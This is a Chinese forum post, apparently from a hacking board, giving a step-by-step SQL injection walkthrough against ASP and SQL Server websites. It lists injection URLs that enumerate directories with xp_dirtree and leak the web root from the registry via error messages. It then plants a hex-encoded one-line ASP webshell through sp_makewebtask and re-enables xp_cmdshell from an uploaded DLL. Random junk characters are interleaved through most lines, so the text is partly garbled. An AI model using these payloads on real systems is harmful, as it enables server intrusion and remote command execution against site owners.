好,我们exec master..xp_dirtree'd:/test'+ i3 I0 L) C5 r" u- v
假设我们在test里有两个文件夹test1和test2在test1里又有test3
! r9 C- I O3 V' ^: f结果显示# t0 C0 ~+ \) C* E& a
( E; \; G+ r1 q! wsubdirectory depth
# v0 Y7 o3 l4 C' L3 c$ xtest1 1
& J4 K( ^! h& A0 Gtest3 2
# d @# n; T5 {6 B1 y" atest2 1
0 s; Z0 k$ h; @: d% |
- ]% m$ a; ~- O, O( I |9 m哈哈发现没有那个depth就是目录的级数
+ r4 K: q- g% K* [ok了,知道怎么办了吧
O) ]! h( g1 b6 L
) A( k) @6 w, N/ q3 ]http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
' I1 L! o/ K% Y0 z5 s: Ohttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- * e% m$ P& d/ A; [
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-; V6 z, X6 b ^
8 n1 K; T0 s$ P, Z只要加上id=1,就是第一级目录 。
& r L5 g% v* t8 j, S n$ ]$ L9 E3 Y* N! R1 B* Q
2 N* K5 X; W/ | v7 X! A4 [
通过注册表读网站路径:
; c, F/ p& r+ _, ^0 }5 F3 r
- j7 L7 w* U* h2 Z9 P1.;create table [dbo].[cyfd] ([gyfd][char](255));
1 G6 J( H b$ o
1 N: {, o# M4 S' \2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--8 @) O, T$ v% K& y1 r5 f* Q+ |
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--, y! x4 i2 |2 F' B* l1 t+ Z
& o( |9 x$ q" W# m; _$ o
3.and 1=(select count(*) from 临时表 where 临时字段名>1)6 a' G3 k3 n* G% B( J7 O3 ?
and 1=(select count(*) from cyfd where gyfd > 1) , p8 c- L/ T7 s' T0 J
这样IE报错,就把刚才插进去的Web路径的值报出来了' {3 _6 Q0 u, ?6 W# U
/ z0 ]% G: ?( L+ E( b4.drop table cyfd;-- 删除临时表
& P6 }, m# s" w e
: _( z" U5 L. y* C( Z2 @获得webshell方法:
: v# x9 C2 q: T1.create table cmd (a image)-- \**cmd是创建的临时表
/ t+ j. J7 x. m
, D/ O2 A- D+ {" V3 r2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话; }3 b4 K2 ~& A$ ]2 w4 h0 q
/ q( R" I! V% V; _0 Y" {# }
: B8 J) ?' J ~- q3 ]3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'! d+ s7 p" h3 G4 u6 ~
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
( p0 |! g1 U8 M& a5 m5 x J4 X1 f# S
4.drop table cmd;-- 删除cmd临时表5 Z% E" }/ E7 q$ ?
! U1 w+ k8 k/ T, W% y: W J0 i: G+ Y6 |
恢复xp_cmdshell方法之一:
3 p! m+ G7 \! i$ e( C" V1 L: S; K9 W9 N我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
+ r3 P9 K+ N# e0 A( n5 a4 M5 ghttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
& R8 y: T8 C% p3 Y$ C0 J0 ^8 T, F1 D恢复,支持绝对路径的恢复哦。:)
) d9 n& b$ O) K( m% `- e |
发表于 2012-9-13 17:20:30
收藏
支持
反对